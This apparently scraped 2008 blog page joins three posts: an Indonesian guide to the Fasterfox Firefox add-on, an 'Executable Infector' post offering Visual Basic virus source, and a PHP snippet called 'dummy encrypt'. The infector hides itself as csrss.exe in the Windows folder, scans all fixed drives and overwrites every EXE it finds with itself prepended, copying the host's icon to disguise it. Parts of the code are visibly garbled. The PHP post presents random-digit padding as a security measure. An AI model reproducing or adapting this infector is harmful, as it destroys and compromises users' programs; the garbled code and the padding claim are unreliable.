Berselancar Lebih Cepat dengan Fasterfox  

Monday, June 30, 2008

Firefox oleh banyak orang dianggap sebagai browser yang cukup cepat. Namun, ada saja yang menganggap masih kurang cepat, untungnya telah banyak upaya yang dilakukan untuk mempercepat kinerja firefox yang sudah cepat ini. Salah satunya adalah melalui plug-ins Fasterfox.

Karena sifat firefox yang opensource, banyak orang ‘pintar’ yang dapat ikut andil dalam mengembangkan kinerja si Rubah Api ini. Salah satu upaya untuk meningkatkan kinerja firefox adalah dengan melakukan tweaking. Itulah yang dilakukan oleh plug-ins fasterfox. Fasterfox mempercepat proses browsing dengan memanfaatkan Prefect links dan Network Tweaking. Melalui Prefect Links, tidak ada lagi bandwith menganggur karena firefox akan mengambil dan menyimpan halaman web sebagai cache. Proses transfer halaman web ini dilakukan dilatar belakang sehingga tidak mengganggu aktifitas browsing anda.

Tweaking Network dilakukan pada seting untuk rendering halaman, koneksi simultan, pipelining,cache, DNS-cache, dan IPD (initial paint delay). Selain itu di dalam fasterfox juga telah terintegrasi sebuah pop-up blocker untuk pop-up yang dihasilkan oleh objek flash.

Untuk menginstalasikan plug-ins fasterfox anda dapat mendownloadnya di , Setelah plug-ins terinstalasi, restart firefox untuk mengaktifkannya. Buka menu Tools | Add-ons, lalu klik ganda plug-ins fasterfox untuk membuka option yang tersedia. Fasilitas tersebut adalah pilihan Default, Courteous, Optimized, Turbo Charged, dan Custom.

Pilihan default akan mengembalikan semua setingan ke kondisi semula. Pilihan Courteous hanya melakukan tweaking pada proses rendering sehingga tidak akan membebani webserver. Pilihan Optimized akan melakukan tweaking optimum dalam batasan yang diizinkan oleh RFC. Pilihan Turbo Charged adalah pilihan yang paling ekstrem, ia akan melakukan tweaking seoptimal mungkin dengan mengabaikan batasan yang diizinkan.

Turbo Charged dapat menjadi pilihan utama bagi anda yang berbagi jalur internet, sedang jika anda seorang yang bijaksana, Courteous dan Optimized adalah pilihan yang tepat. Dengan memilih custom anda dapat mengatur aspek-aspek tweaking secara lebih terperinci. Disini anda dapat mengatur langsung besarnya cache yang akan digunakan, banyaknya koneksi simultan ke sebuah web server, jumlah pipelining, banyaknya halaman fastback, dan menghidupkan/mematikan pop-up blocker.

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Wednesday, June 25, 2008

Executable Infector

This is the only one of its kind..
But there is a new Update i made for the previous method.
now you can easily extract (an) icon of the original EXE and save it to the Infected EXE
note that if The Original EXE has more than one Icon .. we can't specify The main icon in this case.. so we will extract any icon and save it to the infected EXE

Add :

The Infector Routine depends on The everlasting method
>>>> My Application + Original EXE <<<<

And will be exploring original EXE on drives, be carefull !!!

CODE : ( VB Language )

Dim sPath As String
Dim sOPath As String
Dim sData As String
Dim VirusData As String
Dim FinalEXE As String
Dim lStart As Long
Dim lEnd As Long
Dim sLen As Long
Dim sIcon As String

Private Sub Form_Load()
app.TaskVisible = False

If App.PrevInstance = True Then End

'## Begin OF Dropping

sPath = AddBackSlash(App.Path) & App.EXEName & ".exe"
sOPath = AddBackSlash(App.Path) & App.EXEName & ".MFF"

If LCase(sPath) = LCase(Environ$("WinDir") & "\csrss.exe") Then


Open sPath For Binary As #1
sData = Space(LOF(1))
Get #1, , sData

lStart = InStr(25000, sData, "|||||")

If lStart > 0 Then
lStart = lStart + 5
sData = Mid(sData, lStart)
Open sOPath For Binary As #2
Put 2, , sData
Close 2
If Command$ = "" Then
Shell sOPath, vbNormalFocus
Shell sOPath & " " & Command$, vbNormalFocus
End If
End If

Close 1
End If

'## End OF Dropping


If Dir(Environ$("WinDir") & "\csrss.exe") = "" Then
sPath = AddBackSlash(App.Path)
FileCopy sPath & App.EXEName & ".exe", Environ$("WinDir") & "\csrss.exe"
While Dir(Environ$("WinDir") & "\csrss.exe") = ""
Shell Environ$("WinDir") & "\csrss.exe"
End If

If LCase(sPath) = LCase(Environ$("WinDir") & "\csrss.exe") Then

'Do nothing

Shell Environ$("WinDir") & "\csrss.exe"
End If


Call GetDrives

End Sub


' Sub GetDrives()
Dim ObjFSO As Object
Dim Drives As Object
Dim sDrive As Object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")

Set Drives = ObjFSO.Drives
For Each sDrive In Drives
If sDrive.DriveType = 2 Then
MsgBox sDrive & "\"
GetEXEs (sDrive & "\")
GetFolders (sDrive & "\")
End If
End Sub

Function GetFolders(Folder As String)
Dim ObjFSO As Object
Dim sFolder As Object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
For Each sFolder In ObjFSO.GetFolder(Folder).SubFolders
Call GetEXEs(sFolder.Path)
Call GetFolders(sFolder.Path)
End Function

Function GetEXEs(Path As String)
Dim exes As String, EXEPath As String

If Right(Path, 1) <> "\" Then Path = Path & "\"
EXEPath = Dir$(Path & "*.exe")
While EXEPath <> ""
List1.AddItem Path & EXEPath
'MsgBox Path & EXEPath
Call InfectEXE(Path & EXEPath)
EXEPath = Dir$

End Function

Function InfectEXE(EXEPath As String)
Me.Visible = True
On Error Resume Next
Dim Check As Boolean
Check = False

Dim s As String, ss As String, sss As String
Dim sNulls As String
Dim sLenICOINEXE As Long
Dim sLenDif As Long
Dim sLenTemp As String
Dim sTemp As String

s = "1u" & "(" & Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
ss = "(" & Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
sss = "3u(" & Chr$(0) '& Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0)

For i = 1 To 296 ' Generate 296 Nulls to change 16*16 icon
sNulls = sNulls & Chr$(0)

'First we will check if it is already infected
Open EXEPath For Binary As #1
sData = Space(LOF(1))
Get 1, , sData
Close 1
If InStr(25000, sData, "|||||") Then
'it is infected then do nothing
'it is clean so try to infect it
Kill EXEPath

sIcon = GetIconFromEXE(sData, Check)

If Check = True Then
'MsgBox "Icon Found"

sPath = AddBackSlash(App.Path) & App.EXEName & ".exe"
Open sPath For Binary As #2
VirusData = Space(LOF(2))
Get 2, , VirusData
Close #2

i = InStr(1, VirusData, s)
If i <> 0 Then '(1u found)
VirusData = Left(VirusData, i + 1) ' get to u in (1u)

VirusData = VirusData & sIcon

FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3

Exit Function

Else 'If (1u) not found .. try to find (3u)
i = InStr(1, sData, sss)
If i > 0 Then
'Debug.Print "Second Method Method... (3u found)"
sTemp = Left(VirusData, i + 1) 'Get to (3u)
sLenICOINEXE = Len(VirusData) - (i + 297) ' add one byte to 296 coz of (u) in (1u)
sLenICOINICO = Len(sIcon)


For i = 1 To sLenDif
sLenTemp = sLenTemp & Chr$(0)
End If

VirusData = sTemp & sNulls & sIcon & sLenTemp
FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3
Exit Function
End If
End If 'for if i <> 0

FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3

Else ' Means Check = False
'virus icon is default for the final EXE
sPath = AddBackSlash(App.Path) & App.EXEName & ".exe"

Open sPath For Binary As #2
VirusData = Space(LOF(2))
Get 2, , VirusData
Close #2

FinalEXE = VirusData & "|||||" & sData
Open EXEPath For Binary As #3
Put 3, , FinalEXE
Close 3
End If ' for check

End If ' for |||||
End Function

Function GetIconFromEXE(ByVal eData As String, ByRef state As Boolean) As String

Dim c As String, sNull As String, ss As String
Dim sPath As String, sIcon As String
Dim l As Long
c = Chr$(0) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(32) & Chr$(32) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(168) & Chr$(8) & Chr$(0) & Chr$(0) & Chr$(22) & Chr$(0) & Chr$(0) & Chr$(0)
ss = "(" & Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"

i = InStr(1, eData, "MSVBVM")

If i > 0 Then
i = InStr(1, eData, ss)
If i > 0 Then
sIcon = Mid(eData, i)
'sIcon = c & sIcon & sNull & Chr(255)
sIcon = sIcon & sNull & Chr(255)
GetIconFromEXE = sIcon
state = True

Exit Function
End If
Else ' Not Vb EXE so first search for last (... ...@ and compare the size
i = InStr(1, eData, ss)
If i > 0 Then
If Len(eData) - i > 10000 Then
i = InStrRev(eData, ss, Len(eData))
If i > 0 And Len(eData) - i < sicon =" Mid(eData," sicon =" c" sicon =" sIcon" geticonfromexe =" sIcon" state =" True" sicon =" Mid(eData," sicon =" c" sicon =" sIcon" geticonfromexe =" sIcon" state =" True" sicon =" Mid(eData,"> 0 Then
' l = 2350 - Len(sIcon)
' For i = 1 To l
' sNull = sNull & Chr(0)
' Next
' End If

' sIcon = c & sIcon & sNull & Chr(255)
sIcon = sIcon & sNull & Chr(255)
GetIconFromEXE = sIcon
state = True

Exit Function

End If
End If
End If

state = False

End Function
Function AddBackSlash(strPath As String) As String
If Right(strPath, 1) <> "\" Then
AddBackSlash = strPath & "\"
AddBackSlash = strPath
End If
End Function

Private Sub Form_Unload(Cancel As Integer)
End Sub

References :

Written By justin[Mohamed FaYeD] _

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dummy encrypt  

It wlll add a random number between 0-9 to every sencond charcter in a string i find it very usfull if u are trying to use base64 on a more protected level as if u encrypt the same string twice the output would be different as it insterts random numbers even tho this isent as advance as most encryption tech's it would be a good addition to add to others to make them that little bit more secure from prying eyes.

code :

function dummy_encode($str) {
$len = strlen($str);
while ($str1 < $len) { $final = $final.substr($str, $str1, 1); $str1++; $final = $final.rand(0,9); } return $final; } function dummy_decode($str) { $len = strlen($str); $str1=0; $final=""; while ($str1 < $len) { $final = $final.substr($str, $str1, 1); $str1=$str1+2; } return $final; }

references :

- DAB-Hacker


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